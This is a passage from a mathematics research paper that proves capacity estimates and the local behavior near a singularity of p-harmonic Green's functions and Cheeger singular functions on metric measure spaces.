(Estimates from below) \[thm:below\] Let ${\Omega}\subset X$ be a bounded open set, $x_0 \in {\Omega}$, and $Q(x_0)$ be the pointwise dimension at $x_0$. Then there exists $R_0({\Omega})>0$ such that for any $0<r<R\leq R_0({\Omega})$ we have $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) \geq \\ & \left\{\begin{array}{ll} C_1(1-\frac{r}{R})^{p_0(p_0-1)}\frac{\mu(B(x_0,r))}{r^{p_0}},\ \textrm{ if }\ 1<p_0<Q(x_0), \\ C_2(1-\frac{r}{R})^{Q(x_0)(Q(x_0)-1)}\biggl(\log\frac{R}{r}\biggr)^{1-Q(x_0)}, \ \textrm{ if }\ p_0=Q(x_0), \\ C_3(1-\frac{r}{R})^{p_0(p_0-1)}\biggl|(2R)^{\frac{p_0-Q(x_0)}{p_0-1}}-r^{\frac{p_0-Q(x_0)}{p_0-1}}\biggr|^{1-p_0},\ \textrm{ if }\ p_0>Q(x_0), \end{array} \right.\end{aligned}$$ where $$\begin{aligned} C_1 & = C\biggl(1-\frac1{2^{\frac{Q(x_0)-p_0}{p_0-1}}}\biggr)^{p_0-1}, \\ C_2 & =C\frac{\mu(B(x_0,r))}{r^{Q(x_0)}},\\ C_3 & =C\frac{\mu(B(x_0,r))}{r^{Q(x_0)}}\biggl(2^{\frac{p_0-Q(x_0)}{p_0-1}}-1\biggr)^{p_0-1},\end{aligned}$$ with $C > 0$ depending only on $p_0$ and the local doubling constant of ${\Omega}$. Observe that if $X$ supports the weak $(1,1)$-Poincaré inequality, i.e. $p_0 =1$, these estimates reduce to the capacitary estimates, e.g., in Capogna et al. [@CaDaGa Theorem 4.1]. (Estimates from above) \[thm:above\] Let ${\Omega}$, $x_0$, and $Q(x_0)$ be as in Theorem \[thm:below\]. Then there exists $R_0({\Omega})>0$ such that for any $0<r<R\leq R_0({\Omega})$ we have $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) \\ & \leq \left\{\begin{array}{ll} C_4\frac{\mu(B(x_0,r))}{r^{p_0}}, & \textrm{ if }\, 1<p_0<Q(x_0), \\ C_5\biggl(\log\frac{R}{r}\biggr)^{1-Q(x_0)}, & \textrm{ if }\, p_0=Q(x_0), \\ C_6\left|(2R)^{\frac{p_0-Q(x_0)}{p_0-1}}-r^{\frac{p_0-Q(x_0)}{p_0-1}}\right|^{1-p_0}, & \textrm{ if }\, p_0>Q(x_0), \end{array} \right.\end{aligned}$$ where $C_4$ is a positive constant depending only on $p_0$ and the local doubling constant of ${\Omega}$, whereas $$C_5 = C\frac{\mu(B(x_0,r))}{r^{Q(x_0)}},$$ where $C$ is a positive constants depending only on $p_0$ and the local doubling constant of ${\Omega}$, and $$C_6 =C\biggl(2^{\frac{p_0-Q(x_0)}{p_0-1}}-1\biggr)^{-1},$$ with $C > 0$ depending on $p_0$, the local parameters of ${\Omega}$, and $\mu(B(x_0,R_0))$. We have the following immediate corollary. If $1< p_0 \leq Q(x_0)$, then we have $$\label{eq:singleton} \operatorname{Cap}_{p_0}(\{x_0\},{\Omega}) = 0.$$ Green’s functions ================= We define a Green’s function on metric spaces following Holopainen and Shanmugalingam [@HoSha]. Note that Holopainen and Shanmugalingam referred to this function class as singular functions. We consider here a definition that uses an equation for [[$p\mspace{1mu}$]{}]{}-capacities of level sets. Green’s function on a Riemannian manifold satisfies this equation, see Holopainen [@Holopainen]. \[def:G\] Given $1<p_0\leq Q(x_0)$, let ${\Omega}\subset X$ be a relatively compact domain, and $x_0 \in {\Omega}$. An extended real-valued function $G = G(\cdot,x_0)$ on ${\Omega}$ is said to be a *Green’s function with singularity at $x_0$* if the following criteria are satisfied: 1. $G$ is [[$p\mspace{1mu}$]{}]{}$_0$-harmonic and positive in ${\Omega}\setminus\{x_0\}$, 2. $G|_{X\setminus{\Omega}}=0$ [[$p\mspace{1mu}$]{}]{}-quasieverywhere and $G\in N^{1,p_0}_{{_{\rm loc}}}(X\setminus B(x_0,r))$ for all $r>0$, 3. $x_0$ is a singularity, i.e., $$\lim_{x\to x_0}G(x) = \infty.$$ 4. 
whenever $0\leq\alpha < \beta$, $$C_1(\beta-\alpha)^{1-p_0}\leq \operatorname{Cap}_{p_0}({\Omega}^\beta,{\Omega}_\alpha) \leq C_2(\beta-\alpha)^{1-p_0},$$ where ${\Omega}^\beta = \{x\in{\Omega}:\ G(x)\geq \beta\}$, ${\Omega}_\alpha = \{x\in{\Omega}:\ G(x) > \alpha\}$, and $C_1,\,C_2 >0$ are constants depending only on $p_0$. (Existence) The existence of Green’s functions in the $Q$-regular metric space setting was first proved by Holopainen and Shanmugalingam in [@HoSha]. Being a $Q$-regular metric measure space means that the measure $\mu$ satisfies, for all balls $B(x,r)$, a double inequality $$C^{-1}r^Q\leq \mu(B(x,r))\leq Cr^Q$$ with a fixed constant $Q$. There are, however, many instances where the $Q$-regularity condition is not satisfied. For example, systems of vector fields of Hörmander type are, in general, not $Q$-regular for any $Q>0$. In [@GaMa] the $Q$-regularity assumption was removed and the existence of this function class was proved in a more general setting. For the proof of the existence, we refer to [@HoSha Theorem 3.4], see also remarks in [@GaMa]. (Uniqueness) It is not known whether a Green’s function is unique in the metric space setting even in the case of Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic functions. Indeed, the uniqueness of Green’s functions is not settled in Carnot groups when $1<p_0<Q$, where $Q$ is the homogeneous dimension attached to the non-isotropic dilations. However, Green’s function is known to be unique when $p_0=Q$, see Balogh et al. [@BHT].

Local behavior of [[$p\mspace{1mu}$]{}]{}-harmonic Green’s functions
====================================================================

We begin by recalling that if $K\subset{\Omega}$ is closed, $u\in N^{1,p_0}(X)$ is a *[[$p\mspace{1mu}$]{}]{}$_0$-potential* of $K$ (with respect to ${\Omega}$) if

- $u$ is [[$p\mspace{1mu}$]{}]{}$_0$-harmonic on ${\Omega}\setminus K$;

- $u=1$ on $K$ and $u=0$ in $X\setminus{\Omega}$.

By Lemma 3.3 in Holopainen–Shanmugalingam [@HoSha] [[$p\mspace{1mu}$]{}]{}$_0$-potentials always exist if $\operatorname{Cap}_{p_0}(K,{\Omega})<\infty$. From now on, we set $$m(r) = m_G(x_0,r) = \min_{\partial B(x_0,r)}G, \quad M(r)=M_G(x_0,r) = \max_{\partial B(x_0,r)}G,$$ where $G$ is a Green’s function with singularity at $x_0$. We can now state the following growth estimates for a Green’s function near a singularity. In what follows, $R_0({\Omega}) >0$ is the constant from theorems \[thm:below\] and \[thm:above\]. \[thm:blowupI\] Let ${\Omega}$ be a relatively compact domain in $X$, $x_0 \in {\Omega}$, and $1<p_0\leq Q(x_0)$. If $G$ is a Green’s function with singularity at $x_0$ and given $0<R\leq R_0({\Omega})$ for which $\overline{B}(x_0,R) \subset {\Omega}$, then for every $0<r<R$ we have $$m_G(x_0,r) \leq C_1\biggl(\frac1{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R))} \biggr)^{1/(p_0-1)} +M_G(x_0,R).$$ Suppose $r_0 \in (0,R)$ is such that $m_G(x_0,r_0)\geq M_G(x_0,R)$, then for every $0<r<r_0$ we have $$M_G(x_0,r) \geq C_2\biggl(\frac1{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))} \biggr)^{1/(p_0-1)} + M_G(x_0,R),$$ where the constants $C_1$ and $C_2$ both depend only on $p_0$. Consider a radius $R>0$ such that $\overline{B}(x_0,R)\subset{\Omega}$. Since $G(x) \to \infty$ when $x$ tends to $x_0$, the maximum principle implies that $$\label{eq:minest} m(r) \geq m(\rho), \quad 0<r<\rho<R.$$ Define $w=G-M(R)$, and hence $w\leq 0$ on $\partial B(x_0,R)$. 
Observe that the first inequality in the theorem obviously holds true if $m(r) \leq M(R)$, thus, we might as well assume that $$\label{assumption1} m(r) > M(R),$$ and consider the function $v$ in the annulus $B(x_0,R)\setminus\overline{B}(x_0,r)$ defined by $$v = \left\{\begin{array}{ll} 0, & \textrm{ if }\ G\leq M(R), \\ w, & \textrm{ if }\ M(R) < G < m(r), \\ m_w(r), & \textrm{ if }\ G \geq m(r). \end{array} \right.$$ If we extend $v$ by letting $v=m_w(r)$ on $\overline{B}(x_0,r)$, then $v\in N^{1,p_0}_0(B(x_0,R))$. Our assumption implies that $m_w(r)=m(r)-M(R) > 0$, so the function $${\varphi}= \frac{v}{m_w(r)},$$ which equals $1$ in $\overline{B}(x_0,r)$, is both an admissible function for the capacity of $\overline{B}(x_0,r)$ with respect to $B(x_0,R)$ and the [[$p\mspace{1mu}$]{}]{}$_0$-potential of the set $\{x\in X:\ {\varphi}(x)\geq 1\}$ with respect to the set $\{x\in X:\ {\varphi}(x)>0\}$. Thus one has $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) \leq \int_{B(x_0,R)} g_{{\varphi}}^{p_0}\,d\mu \\ & = \operatorname{Cap}_{p_0}(\{x\in X:\ {\varphi}(x)\geq 1\},\{x\in X:\ {\varphi}(x)>0\}) \\ & = \operatorname{Cap}_{p_0}(\{x\in X:\ G(x)\geq m(r)\},\{x\in X:\ G(x)>M(R)\}) \\ & \leq C_1(m(r)-M(R))^{1-p_0},\end{aligned}$$ where we used criterion 4 from Definition \[def:G\] and the fact that ${\varphi}\geq 1$ or ${\varphi}>0$ if and only if $G\geq m(r)$ or $G>M(R)$, respectively. This implies the first claim. To prove the second inequality of the claim, let $w=G-M(R)$. Let $r_0\in(0,R)$ be such that $m(r_0)\geq M(R)$. This implies that $w\geq 0$ on $\overline{B}(x_0,r_0)$ and also that $M(r)\geq M(R)$, for all $0<r<r_0$. Hence, by the maximum principle we have that $$\{x\in {\Omega}:\ G(x)\geq M(r)\} \subset \overline{B}(x_0,r)$$ and $$B(x_0,r_0) \subset \{x\in{\Omega}:\ G(x)>M(R)\}.$$ Hence it follows that $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r), B(x_0,r_0)) \\ & \geq \operatorname{Cap}_{p_0}(\{x\in {\Omega}:\ G(x)\geq M(r)\}, B(x_0,r_0)) \\ & \geq \operatorname{Cap}_{p_0}(\{x\in {\Omega}:\ G(x)\geq M(r)\},\{x\in{\Omega}:\ G(x)>M(R)\}) \\ & \geq C_2(M(r)-M(R))^{1-p_0}, \end{aligned}$$ which implies the second claim and the proof is complete. Theorem 7.1 in Capogna et al. [@CaDaGa] is slightly incorrect as the additional term $M(R)$ is missing from the left-hand and the right-hand side in (ii). However, this does not affect the results in that paper since the additional term can be absorbed when establishing results on the behavior near a singularity. We have the following result on the local behavior of a Green’s function near a singularity. \[thm:localbI\] Let ${\Omega}$ be a relatively compact domain in $X$, and $x_0 \in {\Omega}$. If $G$ is a Green’s function with singularity at $x_0$, then there exist positive constants $C_1,C_2$ and $R_0$ such that for any $0<r<\frac{R_0}{2}$ and $x \in B(x_0,r)$ we have $$\begin{aligned} C_1\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)} & \leq G(x) \\ & \leq C_2\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)},\end{aligned}$$ when $1<p_0<Q(x_0)$, whereas $$C_1 \log\left(\frac{R_0}{d(x,x_0)}\right) \leq G(x) \leq C_2\log\left(\frac{R_0}{d(x,x_0)}\right),$$ when $p_0=Q(x_0)$. Here the constants $C_1$ and $C_2$ depend on $p_0$, $x_0$, and the local parameters of ${\Omega}$, whereas the constant $R_0$ depends only on ${\Omega}$. Let $R_0=\min\{r_0,R_0({\Omega})\}$, where $r_0>0$ is from the second estimate in Theorem \[thm:blowupI\]. 
The Harnack inequality on a sphere implies that there exists a constant $C>0$ such that $$M(r) \leq Cm(r)$$ for every $0< r < R_0$. Let, in particular, $r:=d(x_0,x) < \frac{R_0}{2}$. From the first estimate in Theorem \[thm:blowupI\], the maximum principle, and the Harnack inequality on the sphere, we obtain for any $0< r < \frac{R_0}{2}$ $$\begin{aligned} G(x) & \leq M(r) \leq Cm(r) \\ & \leq C\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R_0))^{-1/(p_0-1)}.\end{aligned}$$ Thanks to Theorem \[thm:below\] we have $$\begin{aligned} G(x) & \leq C\biggl(1-\frac{r}{R_0}\biggr)^{-p_0}\biggl(\frac{r^{p_0}}{\mu(B(x_0,r))}\biggr)^{1/(p_0-1)} \\ & \leq C\biggl(\frac{r^{p_0}}{\mu(B(x_0,r))}\biggr)^{1/(p_0-1)},\end{aligned}$$ when $1<p_0<Q(x_0)$, and $$G(x) \leq C\log\left(\frac{R_0}{r}\right),$$ when $p_0=Q(x_0)$. This proves the estimate from above. To show the estimate from below, observe that the second estimate in Theorem \[thm:blowupI\], the maximum principle, and the Harnack inequality on a sphere imply for $0<r< R_0$ $$\begin{aligned} G(x) & \geq m(r) \geq C^{-1}M(r) \\ & \geq C\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R_0))^{-1/(p_0-1)}.\end{aligned}$$ Applying Theorem \[thm:above\] we conclude for $1<p_0<Q(x_0)$ $$G(x) \geq C\biggl(\frac{r^{p_0}}{\mu(B(x_0,r))}\biggr)^{1/(p_0-1)},$$ and for $p_0=Q(x_0)$ that $$G(x) \geq C\log\left(\frac{R_0}{r}\right).$$ This completes the proof. Note that if $1<p_0<Q(x_0)$ then due to (\[bounds\]), it readily follows that $$C_1d(x,x_0)^{(p_0-Q(x_0))/(p_0-1)} \leq G(x) \leq C_2d(x,x_0)^{(p_0-Q)/(p_0-1)},$$ when $x \in B(x_0,r)$ with $0<r<\frac{R_0}{2}$. Here the constants $C_1$ and $C_2$ depend on $p_0,\, x_0$ and the local parameters of ${\Omega}$. In general a Green’s function $G\notin L^{p_0}_{{_{\rm loc}}}({\Omega})$, but as a corollary of Theorem \[thm:localbI\] we have the following integrability result near a singularity. Let $1<p_0<Q(x_0)$. Under the assumptions of Theorem \[thm:localbI\], one has

- $$G \in \bigcap_{0<q<\frac{Q(x_0)(p_0-1)}{Q-p_0}}L^q(B(x_0,r)),$$

- $$g_G \in \bigcap_{0<q<\frac{Q(x_0)(p_0-1)}{Q-1}}L^q(B(x_0,r)),$$

- If $p_0 > (Q + Q(x_0) - 1)/Q(x_0)$, then $$G \in \bigcap_{1< q<\frac{Q(x_0)(p_0-1)}{Q-1}}N_0^{1,q}(B(x_0,r)).$$

The proof of (i) is an immediate consequence of the estimate from above in Theorem \[thm:localbI\]. To prove (ii), we note that since $1<p_0<Q(x_0)\leq Q$, $$q^*:=\frac{Q(x_0)(p_0-1)}{Q-1} < p_0.$$ Applying Hölder’s inequality, the Caccioppoli inequality, see Björn–Marola [@BjMa Proposition 7.1], and again Theorem \[thm:localbI\], we find for $0<q<p_0$ and for $\sigma \in (0,r)$ $$\int_{B(x_0,2\sigma)\setminus B(x_0,\sigma)}g_G^q\, d\mu \leq C\sigma^{Q(x_0)-\frac{q(Q-1)}{p_0-1}}.$$ Note that the exponent $Q(x_0)-\frac{q(Q-1)}{p_0-1}$ is strictly positive, when $0<q<q^*$ and zero when $q=q^*$. This observation gives us that $$\begin{aligned} \int_{B(x_0,r)}g_G^q\, d\mu & = \sum_{i=0}^\infty\int_{B(x_0,2^{-i}r)\setminus B(x_0,2^{-(i+1)}r)}g_G^q\, d\mu \\ & \leq C\mu(B(x_0,r))\sum_{i=0}^\infty(2^{-i}r)^{Q(x_0)-\frac{q(Q-1)}{p_0-1}}< \infty.\end{aligned}$$ This proves (ii). Finally, (iii) follows from (ii) once we observe that the condition $p_0 > (Q+Q(x_0)-1)/Q(x_0)$ is equivalent to $Q(x_0)(p_0-1)/(Q-1) > 1$.

Cheeger singular functions
==========================

In this section we study Cheeger singular functions, i.e. 
functions that satisfy *only* conditions 1, 2 and 3 in Definition \[def:G\], where the notion of a [[$p\mspace{1mu}$]{}]{}$_0$-harmonic function is replaced by that of a Cheeger [[$p\mspace{1mu}$]{}]{}$_0$-harmonic function. Let $G'$ be a function that satisfies conditions 1–3 in Definition \[def:G\]. We begin by defining $K(G')$ by $$\label{eq:Ku} K(G') = \int_{\Omega}|DG'|^{p_0-2}DG'\cdot D{\varphi}\, d\mu,$$ where ${\varphi}\in N^{1,p_0}_0({\Omega})$ is such that ${\varphi}= 1$ in a neighborhood of $x_0$. If ${\varphi}_i\in N^{1,p_0}_0({\Omega}), i=1,2,$ and ${\varphi}_i=1$ in a neighborhood of $x_0$ then ${\varphi}={\varphi}_1-{\varphi}_2\in N^{1,p_0}_0({\Omega}\setminus\{x_0\})$. This gives us $$\int_{\Omega}|DG'|^{p_0-2}DG'\cdot D{\varphi}_1\, d\mu = \int_{\Omega}|DG'|^{p_0-2}DG'\cdot D{\varphi}_2\, d\mu.$$ Thus $K(G')=K(G',p_0,{\Omega})$; in particular, $K$ does not depend on ${\varphi}$. Another property of $K(G')$ that will play an important role is that $$K(G') > 0,$$ see below. We obtain the following result on the growth of Cheeger singular functions near a singularity. \[thm:blowup\] Let ${\Omega}$ be a relatively compact domain in $X$, $x_0 \in {\Omega}$, and $1<p_0<Q(x_0)$. If $G'$ is a Cheeger singular function, i.e. $G'$ satisfies conditions 1–3 in Definition \[def:G\], with singularity at $x_0$ and given $0<R\leq R_0({\Omega})$ for which $\overline{B}(x_0,R) \subset {\Omega}$, then for every $0<r<R$ we have $$m_{G'}(x_0,r) \leq \biggl(\frac{K(G')}{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R))}\biggr)^{1/(p_0-1)} +M_{G'}(x_0,R).$$ Suppose $r_0 \in (0,R)$ is such that $m_{G'}(x_0,r_0)\geq M_{G'}(x_0,R)$, then for every $0<r<r_0$ we have $$\begin{gathered} M_{G'}(x_0,r) \geq C(1-\frac{r}{r_0})^{p_0}\biggl(\frac{K(G')}{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))}\biggr)^{1/(p_0-1)} \\ + M_{G'}(x_0,R),\end{gathered}$$ where $C=(C_1/C_4)^{1/(p_0-1)} > 0$, and the constants $C_1$ and $C_4$ are as in theorems \[thm:below\] and \[thm:above\], respectively. Consider a radius $R>0$ such that $\overline{B}(x_0,R)\subset{\Omega}$. Define $w=G'-M(R)$, and hence $w\leq 0$ on $\partial B(x_0,R)$. Observe also that the first inequality in the theorem obviously holds true if $m(r) \leq M(R)$, thus, we might as well assume that $m(r) > M(R)$. Let the functions $v$ and ${\varphi}=v/m_w(r)$ be defined as in the proof of Theorem \[thm:blowupI\] with $G$ replaced by $G'$. Then ${\varphi}$ can be used in the definition of $K(G')$, see (\[eq:Ku\]). We have $$\begin{aligned} K(G') & = \int_{B(x_0,R)\setminus \overline{B}(x_0,r)}|DG'|^{p_0-2}DG'\cdot D{\varphi}\, d\mu \\ & = \frac1{m_w(r)}\int_{B(x_0,R)\setminus \overline{B}(x_0,r)} |DG'|^{p_0-2}DG'\cdot Dv\, d\mu.\end{aligned}$$ Observing that $Dv = 0$ whenever $v\neq w$, whereas $Dv=Dw=DG'$ on the set where $v=w$, we conclude $$\label{eq:K=} K(G') = \frac1{m_w(r)}\int_{B(x_0,R)}|Dv|^{p_0}\, d\mu = m_w(r)^{p_0-1}\int_{B(x_0,R)}|D{\varphi}|^{p_0}\, d\mu.$$ Note at this point that (\[eq:K=\]) proves that $K(G')>0$. Indeed, if, in fact, $K(G')\leq 0$, the Sobolev–Poincaré inequality implies that $$\int_{B(x_0,R)}|v|^{p_0}\, d\mu \leq CR^{p_0}\int_{B(x_0,R)} |Dv|^{p_0}\, d\mu \leq 0,$$ and, moreover, $v\equiv 0$ in $B(x_0,R)$. This, in turn, would contradict the fact that $G'(x) \to \infty$ when $x$ tends to $x_0$. This shows that $K(G')>0$. 
Observing that ${\varphi}=v/m_w(r)$ is an admissible function for the capacity of $B(x_0,r)$ with respect to $B(x_0,R)$, we obtain from (\[eq:K=\]) that $$\begin{aligned} \label{eq:upperbound} \operatorname{Cap}_{p_0} & (\overline{B}(x_0,r),B(x_0,R)) \leq \int_{B(x_0,R)\setminus \overline{B}(x_0,r)} |D(v/m_w(r))|^{p_0}\, d\mu \\ & \leq \frac1{m_w(r)^{p_0}}\int_{B(x_0,R)\setminus \overline{B}(x_0,r)}|Dv|^{p_0}\, d\mu \leq m_w(r)^{1-p_0}K(G'). \nonumber\end{aligned}$$ This implies the first claim. To prove the second inequality of the claim, we observe that $w(x) \to \infty$, when $x$ tends to $x_0$. As above, $w=G'-M(R)$. Also, thanks to (\[eq:minest\]), one has that $$m_w(r) \geq m_w(\rho), \quad 0<r<\rho<R.$$ Let $r_0\in(0,R)$ be such that $m(r_0)\geq M(R)$. This implies that $w\geq 0$ on $\overline{B}(x_0,r_0)$. For any $0<r<r_0$ consider the function $\psi:{\mathbb{R}}\to{\mathbb{R}}$ defined by $$\psi(t) = \left\{\begin{array}{ll} 1, & \textrm{ in } 0\leq t \leq r, \\ \frac{t^{\frac{p_0-Q(x_0)}{p_0-1}}-r_0^{\frac{p_0-Q(x_0)}{p_0-1}}}{r^{\frac{p_0-Q(x_0)}{p_0-1}}-r_0^{\frac{p_0-Q(x_0)}{p_0-1}}}, & \textrm{ in } r\leq t\leq r_0, \\ 0, & \textrm{ in } r_0 \leq t \leq R. \end{array} \right.$$ Observe that $\psi \in L^\infty({\mathbb{R}})$, $\operatorname{supp}(\psi') \subset [r,r_0]$, and that $\psi' \in L^\infty({\mathbb{R}})$, thus $\psi$ is a Lipschitz function. Moreover, $\psi\circ d(x_0,x) \in N^{1,p_0}(B(x_0,R))$. As in the proof of Theorem 4.5 in Garofalo–Marola [@GaMa], we obtain $$\int_{B(x_0,R)}|D\psi|^{p_0}\,d\mu \leq C_4\frac{\mu(B(x_0,r))}{r^{p_0}}.$$ On the other hand, if we use Theorem \[thm:below\], for the proof see [@GaMa], we have $$\label{eq} \int_{B(x_0,R)}|D\psi|^{p_0}\,d\mu \leq \frac{C_4}{C_1} (1-\frac{r}{r_0})^{p_0(1-p_0)}\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0)).$$ Since $\psi\circ d(x_0,x)$ is an admissible function for $K(G')$, it follows from (\[eq:Ku\]), (\[eq\]), and Hölder’s inequality that $$\begin{aligned} \label{eq:upper} & K(G')^{p_0/(p_0-1)} \\ & \leq \biggl(\int_{B(x_0,R)}|D\psi|^{p_0}\,d\mu\biggr)^{1/(p_0-1)}\int_{B(x_0,r_0)\setminus \overline{B}(x_0,r)}|DG'|^{p_0}\,d\mu \nonumber \\ & \leq \biggl(\frac{C_4}{C_1}\biggr)^{1/(p_0-1)}(1-\frac{r}{r_0})^{-p_0}\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))^{1/(p_0-1)} \cdot \nonumber \\ & \int_{B(x_0,r_0)\setminus \overline{B}(x_0,r)}|Dw|^{p_0}\,d\mu \nonumber. \end{aligned}$$ Let us introduce the function $\xi \in N^{1,p_0}(B(x_0,R))$ defined by $$\xi = \left\{\begin{array}{ll} 0, & \textrm{ in } {\Omega}\setminus B(x_0,R), \\ \max\{w,0\}, & \textrm{ in } B(x_0,R)\setminus B(x_0,r_0), \\ w, & \textrm{ in } B(x_0,r_0)\setminus B(x_0,r), \\ \min\{w,M_w(r)\}, & \textrm{ in } B(x_0,r). \end{array} \right.$$ Observe that we have $\xi = M_w(r)$ in a neighborhood of $x_0$. Let $$I = \{x\in B(x_0,R):\ \xi (x)=w(x)\}.$$ Since $|D\xi|=|Dw|=|DG'|$ on $I$, and $|D\xi| = 0$ on $B(x_0,R)\setminus I$, from (\[eq:Ku\]) we have $$\begin{aligned} & \int_{B(x_0,r_0)\setminus \overline{B}(x_0,r)}|Dw|^{p_0}\,d\mu \leq \int_I |Dw|^{p_0-2}Dw\cdot Dw\, d\mu \\ & = \int_I|Dw|^{p_0-2}Dw\cdot D\xi\, d\mu = \int_{B(x_0,R)}|Dw|^{p_0-2}Dw\cdot D\xi\, d\mu \\ & = K(G')M_w(r).\end{aligned}$$ By plugging this in (\[eq:upper\]), we finally conclude that $$\begin{gathered} M(r) \geq \biggl(\frac{C_1}{C_4}\biggr)^{1/(p_0-1)}(1-\frac{r}{r_0})^{p_0} \\ \cdot\biggl(\frac{K(G')}{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))}\biggr)^{1/(p_0-1)} + M(R).\end{gathered}$$ This completes the proof. By obvious modifications, the preceding argument holds in the case $p_0=Q(x_0)$ as well. 
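It is perhaps worth recording explicitly the following elementary homogeneity property of $K$, which is immediate from (\[eq:Ku\]) and which motivates the normalization appearing in Proposition \[prop:scaling\] below (the observation is included here only as a reading aid): if $G'$ is a Cheeger singular function and $t>0$, then $tG'$ is again a Cheeger singular function and $$K(tG') = \int_{\Omega}|D(tG')|^{p_0-2}D(tG')\cdot D{\varphi}\, d\mu = t^{p_0-1}K(G').$$ In particular, the choice $t=K(G')^{-1/(p_0-1)}$ yields $K(tG')=1$.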
Observe that, assuming only conditions 1–3 in Definition \[def:G\], the factor $K(G')$ comes up in the above estimates, as opposed to the estimates in Theorem \[thm:blowupI\]. We have the following result on the local behavior of a Cheeger singular function near a singularity. The proof of this result is similar to that of Theorem \[thm:localbI\], and thus we omit it. \[thm:localb\] Let ${\Omega}$ be a relatively compact domain in $X$, and $x_0 \in {\Omega}$. If $G'$ is a Cheeger singular function, i.e. $G'$ satisfies conditions 1–3 in Definition \[def:G\], with singularity at $x_0$, then there exist positive constants $C_1,C_2$ and $R_0$ such that for any $0<r<\frac{R_0}{2}$ and $x \in B(x_0,r)$ we have $$\begin{aligned} C_1\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)} & \leq G'(x) \\ & \leq C_2\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)},\end{aligned}$$ when $1<p_0<Q(x_0)$, whereas $$C_1 \log\left(\frac{R_0}{d(x,x_0)}\right) \leq G'(x) \leq C_2\log\left(\frac{R_0}{d(x,x_0)}\right),$$ when $p_0=Q(x_0)$. Here the constants $C_1$ and $C_2$ depend on $K(G')$, $p_0$, $x_0$, and the local parameters of ${\Omega}$, and $R_0$ depends only on ${\Omega}$. The following lemma is well-known and we omit the proof. \[poteq\] Let $K$ be a closed subset of a relatively compact domain ${\Omega}$, and let $u$ be the [[$p\mspace{1mu}$]{}]{}$_0$-potential of $K$ with respect to ${\Omega}$. Then for all $0\leq\alpha < \beta \leq 1$ one has $$\operatorname{Cap}_{p_0}({\Omega}^{\beta}, {\Omega}_{\alpha})=\frac{\operatorname{Cap}_{p_0}(K,{\Omega})} {(\beta-\alpha)^{p_0-1}}.$$ We close this paper with the following observation. The proof of Proposition \[prop:scaling\] is similar to the proof of Lemma 3.16 in Holopainen [@Holopainen], but we present it here for completeness. \[prop:scaling\] Let $G'$ be a Cheeger singular function, i.e. $G'$ satisfies conditions 1–3 in Definition \[def:G\]. Then $$G = K(G')^{-1/(p_0-1)}G'$$ is a (Cheeger) Green’s function with equality in condition 4 in Definition \[def:G\]. Observing that the function ${\varphi}= \min\{G',1\}$ can be used in (\[eq:Ku\]), and since $G'$ is the [[$p\mspace{1mu}$]{}]{}$_0$-potential of the set $\{x\in{\Omega}: G'\geq 1\}$ with respect to ${\Omega}$, we obtain $$\label{eq:G'pot} \operatorname{Cap}_{p_0}(\{x\in{\Omega}:\ G'(x)\geq 1\},{\Omega}) = K(G').$$ Let $0\leq \alpha < \beta$ and suppose first that $\beta\leq K(G')^{-1/(p_0-1)}$. Then one has $$\begin{aligned} & \operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, \{x\in{\Omega}:\ G(x)>\alpha\}) \\ & = \operatorname{Cap}_{p_0}(\{x\in{\Omega}:\ G'(x) \geq \beta K(G')^{1/(p_0-1)}\}, \\ & \hspace{1.5cm}\{x\in{\Omega}:\ G'(x)>\alpha K(G')^{1/(p_0-1)}\}) \\ & = (\beta-\alpha)^{1-p_0}K(G')^{-1} \operatorname{Cap}_{p_0}(\{x\in{\Omega}: G'(x)\geq 1\}, {\Omega}) \\ & = (\beta-\alpha)^{1-p_0}.\end{aligned}$$ Let us then assume that $K(G')^{-1/(p_0-1)} < \beta$. 
Equation (\[eq:G'pot\]) implies that $$\begin{aligned} & \frac{\operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, {\Omega})}{(K(G')^{-1/(p_0-1)}/\beta)^{p_0-1}} \\ & = \operatorname{Cap}_{p_0}(\{x\in{\Omega}: \frac{G(x)}{\beta}\geq \frac{K(G')^{-1/(p_0-1)}}{\beta}\}, {\Omega}) \\ & = K(G'),\end{aligned}$$ from which it follows that $$\operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, {\Omega}) = \beta^{1-p_0}.$$ Then one has $$\begin{aligned} & \operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, \{x\in{\Omega}:\ G(x)>\alpha\}) \\ & = \operatorname{Cap}_{p_0}(\{x\in{\Omega}:\ G(x)/\beta \geq 1\}, \{x\in{\Omega}:\ G(x)/\beta>\alpha/\beta\}) \\ & = (1-\alpha/\beta)^{1-p_0}\operatorname{Cap}_{p_0}(\{x\in{\Omega}: G(x)\geq \beta\}, {\Omega}) \\ & = (\beta-\alpha)^{1-p_0}.\end{aligned}$$ This completes the proof.

References
==========

Balogh, Z.M., Holopainen, I. and Tyson, J.T., Singular solutions, homogeneous norms, and quasiconformal mappings in Carnot groups, *Math. Ann.* **324** (2002).

